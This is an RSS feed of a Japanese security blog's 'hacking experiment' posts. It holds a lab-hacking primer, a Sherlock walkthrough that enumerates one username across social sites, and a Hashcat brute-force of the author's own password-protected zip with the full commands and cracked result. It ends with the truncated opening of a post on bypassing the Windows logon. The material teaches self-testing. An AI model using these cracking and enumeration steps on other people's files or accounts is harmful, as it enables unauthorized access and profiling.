<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ハッキング実験  |  エンジニア・ラボ</title>
	<atom:link href="https://eidoblog.com/category/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>https://eidoblog.com</link>
	<description>eidoblog.com</description>
	<lastBuildDate>Tue, 28 Nov 2023 15:06:59 +0000</lastBuildDate>
	<language>ja</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.5.2</generator>

<image>
	<url>https://eidoblog.com/wp-content/uploads/2023/11/cropped-DALL·E-2023-11-26-23.05.44-A-simplified-icon-design-for-the-blog-Engineer-Lab.-The-icon-should-be-minimalist-featuring-a-stylized-gear-integrated-with-a-simple-line-drawing-o-32x32.png</url>
	<title>ハッキング実験  |  エンジニア・ラボ</title>
	<link>https://eidoblog.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>ハッキング実験の準備: 初心者向けガイド</title>
		<link>https://eidoblog.com/hacking-experiment-guide/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Thu, 23 Mar 2023 15:30:30 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=541</guid>

					<description><![CDATA[ハッキング実験は、コンピューターセキュリティの知識を深めるために非常に有益です。まずは初心者向けのハッキング実験の準備方法を説明します。あなたもハッキングのエキスパートに一歩近づきましょう！ 目次 1.心構え2.ハッキン [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>ハッキング実験は、コンピューターセキュリティの知識を深めるために非常に有益です。<br>まずは初心者向けのハッキング実験の準備方法を説明します。<br>あなたもハッキングのエキスパートに一歩近づきましょう！</p>



<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="541" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.心構え</a></li><li class="rtoc-item"><a href="#rtoc-2">2.ハッキング実験を行う方法</a></li><li class="rtoc-item"><a href="#rtoc-3">3.必要なツールと技術</a></li><li class="rtoc-item"><a href="#rtoc-4">4.ハッキング実験の手順</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-5">①情報収集</a></li><li class="rtoc-item"><a href="#rtoc-6">➁脆弱性の検出</a></li><li class="rtoc-item"><a href="#rtoc-7">③攻撃の計画</a></li><li class="rtoc-item"><a href="#rtoc-8">④攻撃の実行</a></li><li class="rtoc-item"><a href="#rtoc-9">⑤権限の昇格</a></li><li class="rtoc-item"><a href="#rtoc-10">⑥データの収集</a></li><li class="rtoc-item"><a href="#rtoc-11">⑦痕跡の消去</a></li><li class="rtoc-item"><a href="#rtoc-12">⑧実験後の分析と学習</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-13">5.まとめ</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.心構え</h2>



<p>まず、ハッキング実験を行う際には、倫理観を持つことが重要です。<br>ハッキング行為は、<strong>不正行為となる</strong>ことがあるため、他人のプライバシーや財産権を侵害するような行為は行わないようにしましょう。<br>また、実験を行う前には、<strong>自己責任</strong>で行うこと、自己防衛のために行うことを忘れずに心掛けてください。<br><br>以下の方法を使うことで、<strong>不正行為にならずにセキュリティの知識を深める</strong>ことができます。</p>



<h2 id="rtoc-2"  class="wp-block-heading">2.ハッキング実験を行う方法</h2>



<p>実験を安全に行うためには<strong>検証環境</strong>を使います。<br>検証環境とは、<strong>実際の環境を模した擬似環境</strong>のことです。検証環境を使用することで、実際の環境に影響を与えることなく、ハッキング実験を行うことができます。<br><br>検証環境でハッキング実験を行う方法は、大きく以下の3つに分類されます。</p>



<div class="wp-block-cocoon-blocks-tab-box-1 blank-box bb-tab bb-check block-box">
<ol>
<li><strong>自分のPC</strong>に仮想環境を構築する。</li>



<li> <strong>クラウド上の仮想環境</strong>で実験する。</li>



<li> ハッキングスキルを学べる<strong>サイトを使う</strong></li>
</ol>
</div>



<h5 class="wp-block-heading">2-1. 自分のPCに仮想環境を構築</h5>



<p>仮想環境とは、ハッキング実験を行うための仮想的な環境です。<strong>VirtualBox</strong>や<strong>VMware</strong>などの仮想化ソフトウェアを使用し、自分のPC上に仮想的な環境を構築することができます。仮想環境を構築することで、リスクを最小限に抑えながら、実際の環境でのハッキングに近い状況を再現することができます。</p>



<p>・<span class="marker-under-blue"><strong>仮想環境のメリット</strong></span><br>自由自在な実験が可能。<br>ハッキングによるリスクを最小限に抑えられる。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<p>・<span class="marker-under"><span class="marker-under-red"><strong>仮想環境のデメリット</strong></span></span><br>パフォーマンスが低下する可能性がある。<br>構築に時間がかかることがある。</p>



<p>詳しい方法は、下記の記事をご覧ください。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-none">

<a href="https://eidoblog.com/kali-vmware/" title="Kali Linux 2021.2 構築 攻撃用マシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="90" src="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-120x68.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-320x180.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Kali Linux 2021.2 構築 攻撃用マシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。Kali Linuxの準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.09</div></div></div></div></a>
</div>



<h5 class="wp-block-heading">2-2. クラウド上の仮想環境で実験</h5>



<p>クラウド上には、ハッキング実験用の仮想マシンや演習用の環境が提供されていることがあります。例えば、<strong>AWS</strong>や<strong>Google Cloud Platform</strong>などが挙げられます。クラウド上での実験は、仮想環境に構築する場合と同じく、リスクを最小限に抑えながら、自由自在な実験が可能です。</p>



<p>・<span style="" class="marker-under"><b>クラウド上での実験のメリット</b></span><br>必要なリソースを自由自在に拡張できるため、スケーラビリティに優れている。<br>セキュリティについて心配する必要がない。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<p>・<strong><span class="marker-under-red">クラウド上での実験のデメリット</span></strong><br>初期費用がかかる場合がある。<br>クラウド上での実験にはインターネット接続が必要であるため、環境が不安定な場合がある。<br></p>



<h5 class="wp-block-heading">2-3. サイトを使う</h5>



<p>ハッキング実験用のサイトがいくつか存在しています。例えば、<strong>Hack The Box</strong>や<strong>TryHackMe</strong>などが挙げられます。これらのサイトを利用することで、自分で環境を構築する手間を省くことができます。また、これらのサイトでは、<strong>初心者向けのチュートリアル</strong>が用意されているため、手順に従って実験を行うことができます。</p>



<p>・<span style="" class="marker-under"><b>サイトを使う場合のメリット</b></span><br>手軽に始めることができる。<br>初心者向けのチュートリアルが用意されているため、手順に従って実験を行うことができる。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<p>・<strong><span class="marker-under-red">サイトを使う場合のデメリット</span></strong><br>課金が必要になる可能性がある。<br>実験環境のカスタマイズが制限される場合がある。</p>



<h2 id="rtoc-3"  class="wp-block-heading">3.必要なツールと技術</h2>



<p>ハッキング実験には、いくつか<strong>のツールと技術</strong>が必要です。</p>



<div class="wp-block-cocoon-blocks-tab-box-1 blank-box bb-tab bb-check block-box">
<ul>
<li><strong>Kali Linux:</strong><br>ペネトレーションテストやセキュリティ検査に特化したLinuxディストリビューションです。</li>



<li><strong>Metasploit:</strong><br>脆弱性の検出や攻撃のシミュレーションができるツールです。</li>



<li><strong>Wireshark:</strong><br>ネットワークトラフィックの解析や監視ができるツールです。</li>



<li><strong>Burp Suite:</strong><br>Webアプリケーションのセキュリティテストに使用されるツールです。</li>
</ul>
</div>



<p>これらのツールを使いこなすためには、基本的な<strong>プログラミング知識</strong>や<strong>ネットワーク技術</strong>について学習することが重要です。</p>



<h2 id="rtoc-4"  class="wp-block-heading">4.ハッキング実験の手順</h2>



<p>ハッキング実験は、以下の手順で行います。</p>



<h3 id="rtoc-5"  class="wp-block-heading">①<strong>情報収集</strong></h3>



<p>ターゲットシステムに関する<strong>情報</strong>（IPアドレスやオープンポートなど）を収集します。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<h3 id="rtoc-6"  class="wp-block-heading">➁<strong>脆弱性の検出</strong></h3>



<p><strong>Metasploit</strong>や<strong>Nmap</strong>を使用して、ターゲットシステムの<strong>脆弱性</strong>を特定します。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<h3 id="rtoc-7"  class="wp-block-heading">③<strong>攻撃の計画</strong></h3>



<p>脆弱性を利用した<strong>攻撃手法を計画</strong>し、実行方法を選択します。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<h3 id="rtoc-8"  class="wp-block-heading">④<strong>攻撃の実行</strong></h3>



<p>計画した攻撃手法を用いて、ターゲットシステムに対してハッキング実験を行います。<br>これには、ペネトレーションテストやエクスプロイトの使用が含まれます。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<h3 id="rtoc-9"  class="wp-block-heading">⑤<strong>権限の昇格</strong></h3>



<p>ターゲットシステム内での権限を昇格させ、より高い権限でシステムを操作できるようにします。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<h3 id="rtoc-10"  class="wp-block-heading">⑥<strong>データの収集</strong></h3>



<p>攻撃が成功した場合、ターゲットシステムからデータを収集します。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<h3 id="rtoc-11"  class="wp-block-heading">⑦<strong>痕跡の消去</strong></h3>



<p>実験が終了したら、ターゲットシステム上の痕跡を消去して、元の状態に戻します。</p>



<div style="height:10px" aria-hidden="true" class="wp-block-spacer"></div>



<h3 id="rtoc-12"  class="wp-block-heading">⑧<strong>実験後の分析と学習</strong></h3>



<p>ハッキング実験が終了したら、以下の点について分析し、学習を深めましょう。</p>



<ol>
<li><strong>脆弱性の原因</strong>: ターゲットシステムの脆弱性がどのような原因で生じたのかを理解します。</li>



<li><strong>攻撃手法の効果</strong>: 使用した攻撃手法の効果や限界について検証します。</li>



<li><strong>防御策の改善</strong>: ターゲットシステムに対するより強固な防御策を検討し、実装方法を検討します。</li>
</ol>



<h2 id="rtoc-13"  class="wp-block-heading">5.まとめ</h2>



<p>ハッキング実験は、初心者にとってコンピューターセキュリティの知識やスキルを向上させるために重要な活動です。<br>このブログ投稿では、<strong>ハッキング実験の準備方法</strong>や<strong>実施手順</strong>、<strong>実験後の分析と学習</strong>について説明しました。<strong>倫理的</strong>な枠組みの中で実験を行い、セキュリティ対策の弱点を特定し、より強固な防御策を構築することが重要です。これらの知識を活かして、あなたも<strong>ハッキングのエキスパート</strong>に一歩近づくことができるでしょう。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sherlockを使ってSNSのユーザIDを検索</title>
		<link>https://eidoblog.com/sherlock/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Thu, 13 Jan 2022 00:00:00 +0000</pubDate>
				<category><![CDATA[Python]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=442</guid>

					<description><![CDATA[「Sherlock」というツールを使い、複数のSNSで同じユーザIDが使われていないか検索します。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="442" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.Sherlockとは</a></li><li class="rtoc-item"><a href="#rtoc-3">3.実験</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-4">3-1.実験環境</a></li><li class="rtoc-item"><a href="#rtoc-5">3-2.Sherlockインストール</a></li><li class="rtoc-item"><a href="#rtoc-6">3-3.ユーザIDの検索</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-7">4.まとめ</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>近年、「Tiwitter」や「LINE」といったSNSでアカウントの乗っ取りが多く発生しています。<br>悪意のあるハッカーは様々な方法でターゲットに関する情報を収集し、不正を働きます。<br>今回は「<strong><span class="marker-under">Sherlock</span></strong>」を使い、<strong><span class="marker-under-red"><span class="marker-under">複数のSNSで同じユーザIDが使われていないか</span></span></strong>検索します。</p>



<p> <span class="bold-red">※注意事項※<br>このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a>    </p>



<h2 id="rtoc-2"  class="wp-block-heading">2.Sherlockとは</h2>



<p><strong>「Sherlock」</strong>はPythonで作成されたツールです。<br>TwitterやFacebook、TikTokなど、様々なSNSで<br><strong><span class="marker-under">同じユーザIDが使われているか確認できる</span></strong>ツールです。</p>



<h2 id="rtoc-3"  class="wp-block-heading">3.実験</h2>



<h3 id="rtoc-4"  class="wp-block-heading">3-1.実験環境</h3>



<p>今回は「Kali Linux 」の仮想マシン上で実験を行います。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-reference-link">

<a href="https://eidoblog.com/kali-vmware/" title="Kali Linux 2021.2 構築 攻撃用マシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="90" src="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-120x68.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-320x180.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Kali Linux 2021.2 構築 攻撃用マシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。Kali Linuxの準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.09</div></div></div></div></a>
</div>



<h3 id="rtoc-5"  class="wp-block-heading">3-2.Sherlockインストール</h3>



<p>「<strong>Python3</strong>」および「<strong>pip</strong>」のインストールが必要です。<br>インストールしていない場合は、先に以下コマンドでインストールします。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">#python3インストール
$sudo apt-get install python3

#pipインストール
$sudo apt install python3-pip</pre>



<p><br>次に<a href="https://github.com/sherlock-project/sherlock/blob/master/README.md" data-type="URL" data-id="https://github.com/sherlock-project/sherlock/blob/master/README.md">Sherlock</a>ページからインストール手順を確認します。<br>以下コマンドを順に実行し、<strong><span class="marker-under">Sherlockをインストール</span></strong>します。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group=""># リポジトリのクローン
$ git clone https://github.com/sherlock-project/sherlock.git

# ディレクトリ変更
$ cd sherlock

# 要件をインストール
$ python3 -m pip install -r requirements.txt</pre>



<p>インストール完了です。</p>



<h3 id="rtoc-6"  class="wp-block-heading">3-3.ユーザIDの検索</h3>



<p>以下コマンドを実行し、<strong><span class="marker-under">ユーザIDを検索</span></strong>します。<br>今回は&#8221;labo&#8221;を検索してみます。</p>



<pre class="wp-block-verse">$ python3 sherlock.py --print-found labo</pre>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">└─$ python3 sherlock.py --print-found labo
[*] Checking username labo on:
[+] Blogger: https://labo.blogspot.com
[+] CapFriendly: https://www.capfriendly.com/users/labo
[+] Codecademy: https://www.codecademy.com/profiles/labo
[+] Euw: https://euw.op.gg/summoner/userName=labo
[+] Facenama: https://facenama.com/labo
[+] Gravatar: http://en.gravatar.com/labo
[+] Spotify: https://open.spotify.com/user/labo
[+] TradingView: https://www.tradingview.com/u/labo/
[+] Twitter: https://twitter.com/labo
[+] WordPress: https://labo.wordpress.com/
[+] svidbook: https://www.svidbook.ru/user/labo
......................................
</pre>



<p>色んなサイトで&#8221;labo&#8221;が使われていることがわかります。</p>



<p>実験は以上です。</p>



<h2 id="rtoc-7"  class="wp-block-heading">4.まとめ</h2>



<p>簡単に同じユーザIDが使われているSNSを確認することができました。<br>確認されるだけでは特に問題はありませんが<br>もしも、使いまわしているユーザIDやパスワードが流出した場合、<br>不正アクセスに利用され、アカウントを乗っ取られる可能性があります。</p>



<p><strong><span class="marker-under">パスワードの使い分け</span></strong>や<strong><span class="marker-under">二段階認証</span></strong>を使い、対策を行いましょう。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Hashcatを使ってパスワード付きzipファイルを解析</title>
		<link>https://eidoblog.com/hashcat-zip/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Thu, 06 Jan 2022 00:00:00 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=422</guid>

					<description><![CDATA[hashcatを使い、パスワード付きzipファイルを解析する方法を紹介します。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="422" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.Hashcatとは</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-3">2-1.ハッシュ値</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-4">3.実験</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-5">3-1.zipファイルの用意</a></li><li class="rtoc-item"><a href="#rtoc-6">3-2.「zip2john」のインストール</a></li><li class="rtoc-item"><a href="#rtoc-7">3-3.「Hashcat」のインストール</a></li><li class="rtoc-item"><a href="#rtoc-8">3-4.ハッシュ値取得</a></li><li class="rtoc-item"><a href="#rtoc-9">3-5.パスワード解析</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-10">4.まとめ</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>今回はHashcatというツールを使って、<br><strong>パスワード付きzipファイルを解析</strong>します。</p>



<p> <span class="bold-red">※注意事項※<br>このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a>   </p>



<h2 id="rtoc-2"  class="wp-block-heading">2.Hashcatとは</h2>



<p>Hashcatは<strong><span class="marker-under">ハッシュ値からパスワードを解析する</span></strong>のツールです。<br>様々なハッシュの規格に対応しており、ブルートフォース攻撃や辞書攻撃などの手法が可能です。</p>



<h3 id="rtoc-3"  class="wp-block-heading">2-1.ハッシュ値</h3>



<p>ハッシュ値とは、<strong><span class="marker-under">元のデータから特定の計算方法によって求められた値</span></strong>です。<br>ハッシュ値を求めるための計算手順のことをハッシュ関数と呼ばれます。</p>



<h2 id="rtoc-4"  class="wp-block-heading">3.実験</h2>



<p>ハッシュ化に用いられるハッシュ関数はいくつか規格（パターン）が決まっており<br>hashcatを使うことで、その規格に当てはまるパスワードを解析します。</p>



<h3 id="rtoc-5"  class="wp-block-heading">3-1.zipファイルの用意</h3>



<p>本記事では<strong>Kali linux環境でzipファイルを用意</strong>します。<br>以下のコマンドでパスワードが「<strong><span class="marker-under-red">pass</span></strong>」と設定したzipファイルを作成します。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ echo "labo" > labo.txt
─$ zip -e --password=pass labo.zip labo.txt</pre>



<h3 id="rtoc-6"  class="wp-block-heading">3-2.「zip2john」のインストール</h3>



<p>「zip2john」とは<strong><span class="marker-under">zipファイルからハッシュ値を抜き出す</span></strong>ためのツールです。<br><a href="https://www.openwall.com/john/" data-type="URL" data-id="https://www.openwall.com/john/">John The Ripper</a>からモジュールをダウンロードし、インストールします。<br>※Kali Linuxを使えば初めからインストールされています。</p>



<h3 id="rtoc-7"  class="wp-block-heading">3-3.「Hashcat」のインストール</h3>



<p>「Hashcat」をWindowsにインストールします。<br>Hashcatは<a href="https://hashcat.net/hashcat/" data-type="URL" data-id="https://hashcat.net/hashcat/">公式サイト</a>からダウンロードし、適当なフォルダに展開します。<br> ※Kali Linuxを使えば初めからインストールされています。 </p>



<h3 id="rtoc-8"  class="wp-block-heading">3-4.ハッシュ値取得</h3>



<p>以下コマンドでzipファイルから<strong>ハッシュ値を取得</strong>します。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ zip2john labo.zip | cut -d ":" -f 2 > labo.zip.hash
ver 1.0 efh 5455 efh 7875 labo.zip/labo.txt PKZIP Encr: 2b chk, TS_chk, cmplen=17, decmplen=5, crc=50997C0F ts=5929 cs=5929 type=0

─$ cat labo.zip.hash
$pkzip$1*2*2*0*11*5*50997c0f*0*42*0*11*5929*d5803b0e15bdbb752253549abda1607fb5*$/pkzip$</pre>



<p>以下hashcatのページで<strong>ハッシュ形式</strong>を確認します。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-reference-link">

<a rel="noopener" href="https://hashcat.net/wiki/doku.php?id=example_hashes" title="
    example_hashes    [hashcat wiki]
  " class="blogcard-wrap external-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard external-blogcard eb-left cf"><div class="blogcard-label external-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail external-blogcard-thumbnail"><img decoding="async" src="https://s.wordpress.com/mshots/v1/https%3A%2F%2Fhashcat.net%2Fwiki%2Fdoku.php%3Fid%3Dexample_hashes?w=320&#038;h=198" alt="" class="blogcard-thumb-image external-blogcard-thumb-image" width="320" height="198" /></figure><div class="blogcard-content external-blogcard-content"><div class="blogcard-title external-blogcard-title">
    example_hashes    [hashcat wiki]
  </div><div class="blogcard-snippet external-blogcard-snippet"></div></div><div class="blogcard-footer external-blogcard-footer cf"><div class="blogcard-site external-blogcard-site"><div class="blogcard-favicon external-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://hashcat.net/wiki/doku.php?id=example_hashes" alt="" class="blogcard-favicon-image external-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain external-blogcard-domain">hashcat.net</div></div></div></div></a>
</div>



<h3 id="rtoc-9"  class="wp-block-heading">3-5.パスワード解析</h3>



<p>Hashcatを使って、<strong><span class="marker-under">パスワードを解析</span></strong>します。<br>以下コマンドを実行します。</p>



<pre class="wp-block-verse">-$ hashcat -m 17210 -a 3 labo.zip.hash --increment '?a?a?a?a'</pre>



<p>-m:ハッシュ形式指定(17210)<br>-a:アタックモード指定 &#8220;3&#8221; (ブルートフォース攻撃)<br>&#8211;increment:マスクの長さを指定(指定文字数まで1桁ずつ増やす)<br>&#8216;?a?a?a?a&#8217;:マスク文字指定</p>



<p>Hashcatのwikiからオプションについて詳しく確認できます。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-reference-link">

<a rel="noopener" href="https://hashcat.net/wiki/doku.php?id=mask_attack" title="
    mask_attack    [hashcat wiki]
  " class="blogcard-wrap external-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard external-blogcard eb-left cf"><div class="blogcard-label external-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail external-blogcard-thumbnail"><img decoding="async" src="https://s.wordpress.com/mshots/v1/https%3A%2F%2Fhashcat.net%2Fwiki%2Fdoku.php%3Fid%3Dmask_attack?w=320&#038;h=198" alt="" class="blogcard-thumb-image external-blogcard-thumb-image" width="320" height="198" /></figure><div class="blogcard-content external-blogcard-content"><div class="blogcard-title external-blogcard-title">
    mask_attack    [hashcat wiki]
  </div><div class="blogcard-snippet external-blogcard-snippet"></div></div><div class="blogcard-footer external-blogcard-footer cf"><div class="blogcard-site external-blogcard-site"><div class="blogcard-favicon external-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://hashcat.net/wiki/doku.php?id=mask_attack" alt="" class="blogcard-favicon-image external-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain external-blogcard-domain">hashcat.net</div></div></div></div></a>
</div>



<p><br>解析の結果、ハッシュ値の後に<strong><span class="marker-under">解析結果「pass」</span></strong>が表示されました。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ hashcat -m 17210 -a 3 labo.zip.hash --increment '?a?a?a?a'
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project
............................................
......................................
...........................
................
$pkzip$1*2*2*0*11*5*50997c0f*...52253549abda1607fb5*$/pkzip$:pass
</pre>



<p>実験は以上です。</p>



<h2 id="rtoc-10"  class="wp-block-heading">4.まとめ</h2>



<p>今回はHashcatを使い、zipファイルのパスワードを解析することができました。<br>記事のような簡単なパスワードだとすぐに解析が終わってしまうため、<strong>アルファベットや記号を混ぜた8桁以上の複雑なパスワード</strong>を設定しましょう。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Windows10のログオン認証をハッキング</title>
		<link>https://eidoblog.com/winlogon-sethc/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Fri, 31 Dec 2021 03:00:00 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=400</guid>

					<description><![CDATA[今回の目的はWindowsのログオン認証をハッキングします。
自分のWindowsPCのログオンパスワードがわからなくなったときに利用できます。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="400" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
